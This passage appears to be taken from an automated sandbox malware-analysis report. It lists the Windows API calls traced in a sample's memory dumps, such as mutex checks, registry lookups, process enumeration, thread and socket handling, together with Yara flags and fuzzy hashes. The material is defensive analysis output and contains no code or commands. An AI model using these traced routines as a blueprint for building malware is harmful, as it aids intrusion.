• Instruction Fuzzy Hash: 4A4184B2E0561DABDB10DFA8CC40AEEF7F8FB84710F144666D955E7240D77659008BA4
APIs
• CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
• GetLastError.KERNEL32 ref: 10015E13
• CloseHandle.KERNEL32(?), ref: 10015E24
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
• GetCurrentThread.KERNEL32 ref: 10015E3C
• WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
• CreateThread.KERNEL32 ref: 10015E58
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
• String ID:
• API String ID: 355449500-0
• Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
• Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
• Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
• Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25
APIs
• _memset.LIBCMT ref: 03076DD9
• RegOpenKeyExW.KERNEL32(80000001,03095164,00000000,00020019,75BF73E0), ref: 03076DFC
• RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03076E4A
• lstrcmpW.KERNEL32(?,03095148), ref: 03076E60
• lstrcpyW.KERNEL32(030756EA,?), ref: 03076E72
Strings
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: OpenQueryValue_memsetlstrcmplstrcpy
• String ID: GROUP
• API String ID: 2102619503-2593425013
• Opcode ID: 1d6d92bb800cb6f925dd643d9b71dafcd321a08c6623d83f21392b51e7d1996d
• Instruction ID: cce26deaa97c2d529c230690acef6fb05c9192c0916f843a197be3b90b206a03
• Opcode Fuzzy Hash: 1d6d92bb800cb6f925dd643d9b71dafcd321a08c6623d83f21392b51e7d1996d
• Instruction Fuzzy Hash: BA31857190231DBBDB20DF90DC89BDEB7B8FB48710F100699E519A7180DB79AA84CF64
APIs
• ___set_flsgetvalue.LIBCMT ref: 02717240
• __calloc_crt.LIBCMT ref: 0271724C
• __getptd.LIBCMT ref: 02717259
• CreateThread.KERNEL32 ref: 02717290
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0271729A
• _free.LIBCMT ref: 027172A3
• __dosmaperr.LIBCMT ref: 027172AE
  • Part of subcall function 0271710D: __getptd_noexit.LIBCMT ref: 0271710D
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: d993ed99873ab9e31c8e43eada4ed98a1b73905c705f513c612ccff121726920
• Instruction ID: 202107dd127ed9b702fe2bc5bc3e77cb5f2e75ae144d5d07c78d4129b040c1be
• Opcode Fuzzy Hash: d993ed99873ab9e31c8e43eada4ed98a1b73905c705f513c612ccff121726920
• Instruction Fuzzy Hash: AE11E532200306AFE72AAFAC9C48E9BB7E9EF45774B100419FA1496140DB31C5128AA0
APIs
• ___set_flsgetvalue.LIBCMT ref: 0307FA4E
• __calloc_crt.LIBCMT ref: 0307FA5A
• __getptd.LIBCMT ref: 0307FA67
• CreateThread.KERNEL32 ref: 0307FA9E
• GetLastError.KERNEL32(?,00000000,?,?,0307E003,00000000,00000000,03075F40,00000000,00000000,00000000), ref: 0307FAA8
• _free.LIBCMT ref: 0307FAB1
• __dosmaperr.LIBCMT ref: 0307FABC
  • Part of subcall function 0307F91B: __getptd_noexit.LIBCMT ref: 0307F91B
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: 17db6ad38d07714fa3b131fe870307e0d1c6559e97e9d92ea3b9962dad8ee1c0
• Instruction ID: 00c09cf191429b072a365e4f92501543b7fc49d8295b8ebc3f2616a6da96f3ac
• Opcode Fuzzy Hash: 17db6ad38d07714fa3b131fe870307e0d1c6559e97e9d92ea3b9962dad8ee1c0
• Instruction Fuzzy Hash: C111C27A60770BBFDB11FFA5EC4099B37D9EF85A647140426F9448A180DB70D4018A68
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03077523), ref: 0307743D
• GetProcAddress.KERNEL32(00000000), ref: 03077444
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 03077452
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 0307745A
Strings
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: InfoSystem$AddressHandleModuleNativeProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 3433367815-192647395
• Opcode ID: 541ddd0232c3bba90f859af4b9871e6917a384791fba0e60afbfd2ccb6471e11
• Instruction ID: 0e3a638a837931eae169ee4bd30006f7eac9d764cf11bd614500b2e37cba94eb
• Opcode Fuzzy Hash: 541ddd0232c3bba90f859af4b9871e6917a384791fba0e60afbfd2ccb6471e11
• Instruction Fuzzy Hash: D401A270D0220CAFCF90DFB898046FEBBF4EB08600F0005AAD559E3200E7398A10CFA4
APIs
• ___set_flsgetvalue.LIBCMT ref: 027171BC
  • Part of subcall function 02719754: TlsGetValue.KERNEL32(00000000,027198AD,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000), ref: 0271975D
  • Part of subcall function 02719754: DecodePointer.KERNEL32(?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA,0000000D), ref: 0271976F
  • Part of subcall function 02719754: TlsSetValue.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 0271977E
• ___fls_getvalue@4.LIBCMT ref: 027171C7
  • Part of subcall function 02719734: TlsGetValue.KERNEL32(?,?,027171CC,00000000), ref: 02719742
• ___fls_setvalue@8.LIBCMT ref: 027171DA
  • Part of subcall function 02719788: DecodePointer.KERNEL32(?,?,?,027171DF,00000000,?,00000000), ref: 02719799
• GetLastError.KERNEL32(00000000,?,00000000), ref: 027171E3
• ExitThread.KERNEL32 ref: 027171EA
• GetCurrentThreadId.KERNEL32 ref: 027171F0
• __freefls@4.LIBCMT ref: 02717210
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
• Opcode ID: 71bfe619023cb83c0f4fe0403428de41075618d05d37eb205f477f63edf16712
• Instruction ID: e9637b00c39f66ae5a24bbf16c011d1878818ddbfea878ddfc8c28e65164a459
• Opcode Fuzzy Hash: 71bfe619023cb83c0f4fe0403428de41075618d05d37eb205f477f63edf16712
• Instruction Fuzzy Hash: 5FF09074400241EBC71DBF79CD5C94EBBAAAF88344325CC58EA048B201DB34D8478FA0
APIs
• ___set_flsgetvalue.LIBCMT ref: 0307F9CA
  • Part of subcall function 03083CA0: TlsGetValue.KERNEL32(00000000,03083DF9,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000), ref: 03083CA9
  • Part of subcall function 03083CA0: DecodePointer.KERNEL32(?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06,0000000D), ref: 03083CBB
  • Part of subcall function 03083CA0: TlsSetValue.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083CCA
• ___fls_getvalue@4.LIBCMT ref: 0307F9D5
  • Part of subcall function 03083C80: TlsGetValue.KERNEL32(?,?,0307F9DA,00000000), ref: 03083C8E
• ___fls_setvalue@8.LIBCMT ref: 0307F9E8
  • Part of subcall function 03083CD4: DecodePointer.KERNEL32(?,?,?,0307F9ED,00000000,?,00000000), ref: 03083CE5
• GetLastError.KERNEL32(00000000,?,00000000), ref: 0307F9F1
• ExitThread.KERNEL32 ref: 0307F9F8
• GetCurrentThreadId.KERNEL32 ref: 0307F9FE
• __freefls@4.LIBCMT ref: 0307FA1E
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
• Opcode ID: faa950d4b3153849c36832d66fe64be02d1d3efb8d6408d80de76cff74a68b6b
• Instruction ID: c16ebc416d66efe79c662b10074bc7049fa79a910ed2f7e914f5ffd5891b9ca3
• Opcode Fuzzy Hash: faa950d4b3153849c36832d66fe64be02d1d3efb8d6408d80de76cff74a68b6b
• Instruction Fuzzy Hash: FEF0967CA03305BBC708FF70C50888E7FACBFC56403108498E9458F201DA34D441C795
APIs
• _memset.LIBCMT ref: 0307607C
• CreateToolhelp32Snapshot.KERNEL32 ref: 03076088
• Process32FirstW.KERNEL32 ref: 030760B9
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0307610F
• CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03076116
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
• String ID:
• API String ID: 2526126748-0
• Opcode ID: 6060387a09e0ec22400d647f753233fd3ab6a539cff5a6b190893ea9be770dd4
• Instruction ID: c79537503d9171b9a69e04e019517a9f849ef8a3f65b8813bb1f1b1c5af25214
• Opcode Fuzzy Hash: 6060387a09e0ec22400d647f753233fd3ab6a539cff5a6b190893ea9be770dd4
• Instruction Fuzzy Hash: 0021B731A0611DABDB20FF68DC59BEAB3A9FF15310F044699DD0A97280EB369A10C694
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 027132F1
• Sleep.KERNEL32(00000258), ref: 027132FE
• InterlockedExchange.KERNEL32(?,00000000), ref: 02713306
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02713312
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0271331A
• Sleep.KERNEL32(0000012C), ref: 0271332B
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
• String ID:
• API String ID: 3137405945-0
• Opcode ID: 2f2f752fac218e5ccc4c2d2db805611f154d147b3dbd07da9a4444b604a551aa
• Instruction ID: 808f15d4097d4d6b41ff05c7f758f97652b5abcba19b3815073c2d6af2b615af
• Opcode Fuzzy Hash: 2f2f752fac218e5ccc4c2d2db805611f154d147b3dbd07da9a4444b604a551aa
• Instruction Fuzzy Hash: EEF082722443046BD634ABA9DC84E56F3A8AF85330B218B09F221872D0CAB0E8058BA0
APIs
• CoInitialize.OLE32(00000000), ref: 0307669B
• CoCreateInstance.OLE32(030946FC,00000000,00000001,0309471C,?,?,?,?,?,?,?,?,?,?,0307588A), ref: 030766B2
• SysFreeString.OLEAUT32(?), ref: 0307674C
• CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0307588A), ref: 0307677D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CreateFreeInitializeInstanceStringUninitialize
• String ID: FriendlyName
• API String ID: 841178590-3623505368
• Opcode ID: 0d8b21a7ef0d6668cae749d85a94cf2159e49e22f9dbc4d2cd43fea4e841776f
• Instruction ID: 90b397c1c35e7e4923d44533e0ef34dedd9f45e5c53da1570327052172db1997
• Opcode Fuzzy Hash: 0d8b21a7ef0d6668cae749d85a94cf2159e49e22f9dbc4d2cd43fea4e841776f
• Instruction Fuzzy Hash: 82316875B0160AAFDB00DB99CC80EAEB7BDEF88704F148589F505EB250DB71E902CB60
APIs
• _malloc.LIBCMT ref: 0307F721
  • Part of subcall function 0307F673: __FF_MSGBANNER.LIBCMT ref: 0307F68C
  • Part of subcall function 0307F673: __NMSG_WRITE.LIBCMT ref: 0307F693
  • Part of subcall function 0307F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76), ref: 0307F6B8
• std::exception::exception.LIBCMT ref: 0307F756
• std::exception::exception.LIBCMT ref: 0307F770
• __CxxThrowException@8.LIBCMT ref: 0307F781
Strings
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
• Opcode ID: df3477999bdbd7a91fc4b556c1d240d4bfcc92aabfcb57f3e9eaa2f953e80916
• Instruction ID: d0ecb7b5999da5a1afaf0be3ff560b128d86b9db88ea4029146ff250be1df97b
• Opcode Fuzzy Hash: df3477999bdbd7a91fc4b556c1d240d4bfcc92aabfcb57f3e9eaa2f953e80916
• Instruction Fuzzy Hash: 8EF0FF75D0330FABEF04FB54EC24ADE7BE8AF80218F54001AE814EA191DB70CA05DB98
APIs
• ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
• ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
• ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
• ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
• fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
• String ID:
• API String ID: 1074265955-0
• Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
• Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
• Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
• Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
APIs
• _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
• malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
• _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
• stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
• _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
• String ID:
• API String ID: 1722040371-0
• Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
• Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
• Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
• Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02712D3C
• CancelIo.KERNEL32(?), ref: 02712D46
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 02712D4F
• closesocket.WS2_32(?), ref: 02712D59
• SetEvent.KERNEL32(00000001), ref: 02712D63
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: 8f18371ad4a1ae414f1fd93289b76f0e700f7c31e25c797abaa6f4a32c244744
• Instruction ID: 1f6a8ac5d6b603e0a9997760857c52381f2c3e27f0317507139b7740fcff50b0
• Opcode Fuzzy Hash: 8f18371ad4a1ae414f1fd93289b76f0e700f7c31e25c797abaa6f4a32c244744
• Instruction Fuzzy Hash: 44F04F76640700ABD3349F64DD49F6677B8FB49B11F508A5DFA8297680C7B0B9088BA0
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03072D5C
• CancelIo.KERNEL32(?), ref: 03072D66
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 03072D6F
• closesocket.WS2_32(?), ref: 03072D79
• SetEvent.KERNEL32(00000001), ref: 03072D83
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: c8c02214cf27a0cef491a9037e4537b15f8c8d6d6595a1d30027fee08223de59
• Instruction ID: b745d779923c8616f7b2c57506feb32f2fa0a3f97449b38b39b75d0655a26846
• Opcode Fuzzy Hash: c8c02214cf27a0cef491a9037e4537b15f8c8d6d6595a1d30027fee08223de59
• Instruction Fuzzy Hash: BFF08C76101308BBC224AF58DD09F6673FCFB48B11F004A0DF69696684C6B4B9088BA4
APIs
• ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
• ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
• ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
• ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
• String ID:
• API String ID: 1566052064-0
• Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
• Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
• Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
• Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
APIs
• _malloc.LIBCMT ref: 02716F31
  • Part of subcall function 02716E83: __FF_MSGBANNER.LIBCMT ref: 02716E9C
  • Part of subcall function 02716E83: __NMSG_WRITE.LIBCMT ref: 02716EA3
  • Part of subcall function 02716E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F), ref: 02716EC8
• std::exception::exception.LIBCMT ref: 02716F66
• std::exception::exception.LIBCMT ref: 02716F80
• __CxxThrowException@8.LIBCMT ref: 02716F91
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID:
• API String ID: 615853336-0
• Opcode ID: 20b50069ef97e46a977e9b1d5ff9c7366010ebf0d5fc9b9a536df40a3f049f47
• Instruction ID: 61f8c5b22b2a5836da15edb9112e5b625116b118c00d91f74ba21b9c5ecbbd2c
• Opcode Fuzzy Hash: 20b50069ef97e46a977e9b1d5ff9c7366010ebf0d5fc9b9a536df40a3f049f47
• Instruction Fuzzy Hash: B2F0FC32900119AAEF15EBADDD15AAE7FBFAF01718F15442DE415A60D0DFB0CA48CF51
APIs
• GetCurrentThreadId.KERNEL32 ref: 0307316B
• InterlockedExchange.KERNEL32(?,00000001), ref: 03073183
• GetCurrentThreadId.KERNEL32 ref: 0307322F
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CurrentThread$ExchangeInterlocked
• String ID:
• API String ID: 4033114805-0
APIs
• ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
• ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
• ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
